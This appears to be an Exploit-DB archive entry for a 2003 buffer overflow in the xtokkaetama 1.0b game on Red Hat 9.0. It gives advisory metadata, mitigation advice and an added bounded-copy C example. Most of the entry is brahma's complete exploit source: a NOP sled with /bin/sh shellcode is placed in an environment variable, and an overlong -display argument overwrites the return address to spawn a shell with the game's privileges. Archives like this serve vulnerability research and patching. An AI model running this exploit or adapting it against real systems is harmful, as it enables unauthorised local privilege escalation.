Vendor: xtokkaetama
By: brahma
CVSS: 7.5 (HIGH)
Local game exploit
CWE: 119
Product Name: xtokkaetama
Affected Version From: 1.0b
Affected Version To: 1.0b
Patch Exists: NO
Related CWE:
CPE: a:xtokkaetama:xtokkaetama:1.0b
Metasploit:
Other Scripts:
Platforms Tested: Red Hat 9.0
2003

xtokkaetama 1.0b local game exploit on Red Hat 9.0

xtokkaetama 1.0b contains a buffer overflow in the game binary that lets a local attacker execute arbitrary code with the privileges of the game user. The exploit reproduced below passes a specially crafted value for the game's -display option, which overwrites the return address and gives the attacker control of the program flow. It targets Red Hat 9.0 and requires local access to the system.

Mitigation:

Update the xtokkaetama game binary to a patched version that fixes the buffer overflow. Restrict access to the game executable so that only trusted users can run it.
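
A bounded way to handle the -display value that the exploit below passes in, as an added example (not xtokkaetama's code or a published patch). The 256-byte limit, the character whitelist and both function names are assumptions made for illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define DISPLAY_MAX 256  /* assumed limit; the game's real buffer size is not on the page */

/* Copy an X display name into a fixed buffer without overflowing it.
 * Returns 0 on success, -1 if the name does not fit or has unexpected bytes. */
int copy_display_name(char *dst, size_t dstsz, const char *src)
{
    size_t len;

    if (dst == NULL || src == NULL || dstsz == 0)
        return -1;
    /* Scan at most dstsz bytes, so an oversized argument is never fully read. */
    for (len = 0; len < dstsz && src[len] != '\0'; len++) {
        unsigned char c = (unsigned char)src[len];
        /* Assumed whitelist: host:display.screen needs only these characters. */
        if (!isalnum(c) && strchr(".:-_/", c) == NULL)
            return -1;
    }
    if (len >= dstsz)                 /* no room left for the terminating NUL */
        return -1;
    memcpy(dst, src, len + 1);        /* length was checked against dstsz above */
    return 0;
}

/* Return the value that follows "-display" on the command line, or NULL. */
const char *find_display_arg(int argc, char **argv)
{
    int i;
    for (i = 1; i + 1 < argc; i++)
        if (strcmp(argv[i], "-display") == 0)
            return argv[i + 1];
    return NULL;
}

int main(int argc, char **argv)
{
    char display[DISPLAY_MAX];
    const char *arg = find_display_arg(argc, argv);

    if (arg != NULL && copy_display_name(display, sizeof display, arg) != 0) {
        fprintf(stderr, "rejected -display argument\n");
        return 1;
    }
    puts(arg ? display : "no -display given");
    return 0;
}
```
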
Source

Exploit-DB raw data:

/*
*  xtokkaetama 1.0b local game exploit on Red Hat 9.0
*               Coded by brahma (31/07/2003)
*
*       http://www.debian.org/security/2003/dsa-356
*/


#include <stdlib.h>
#define RETADDR 0xbfffff11 
#define DEFAULT_BUFFER_SIZE 29
#define DEFAULT_EGG_SIZE 512 
#define NOP 0x90
#define BIN "/usr/X11R6/bin/xtokkaetama" 
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_esp(void) {
__asm__("movl %esp,%eax");
}

void main(int argc, char *argv[]) {
char *buff, *ptr, *egg;
long *addr_ptr, addr;
int bsize=DEFAULT_BUFFER_SIZE;
int i, eggsize=DEFAULT_EGG_SIZE;

if (argc > 1) bsize = atoi(argv[1]);
if (argc > 2) eggsize = atoi(argv[2]);


if (!(buff = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
if (!(egg = malloc(eggsize))) {
printf("Can't allocate memory.\n");
exit(0);
}

addr = RETADDR; 
printf("Using address: 0x%x\n", addr);

ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;

ptr = egg;
for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
*(ptr++) = NOP;

for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];

buff[bsize - 1] = '\0';
egg[eggsize - 1] = '\0';

memcpy(egg,"EGG=",4);
putenv(egg);
execl(BIN,BIN,"-display",buff,NULL);
}



// milw0rm.com [2003-08-01]